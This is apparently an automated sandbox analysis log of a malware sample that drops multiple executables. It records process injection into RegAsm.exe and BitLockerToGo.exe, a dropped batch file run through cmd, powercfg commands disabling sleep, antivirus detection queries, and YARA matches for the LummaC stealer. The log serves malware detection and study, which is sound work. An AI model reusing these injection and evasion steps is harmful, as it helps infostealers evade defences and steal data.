Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 835008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E40008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F06008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B09008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FileApp.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 22_2_69D04760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 22_2_69BE1C30
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0053D8FE cpuid 2_2_0053D8FE
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 22_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\FileApp.exe Queries volume information: C:\Users\user\Desktop\FileApp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Queries volume information: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Queries volume information: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Queries volume information: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Queries volume information: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Queries volume information: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 22_2_00417420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 22_2_004172F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 22_2_004174D0
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 14_2_0040681B
Source: C:\Users\user\Desktop\FileApp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies power options to not sleep / hibernate
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
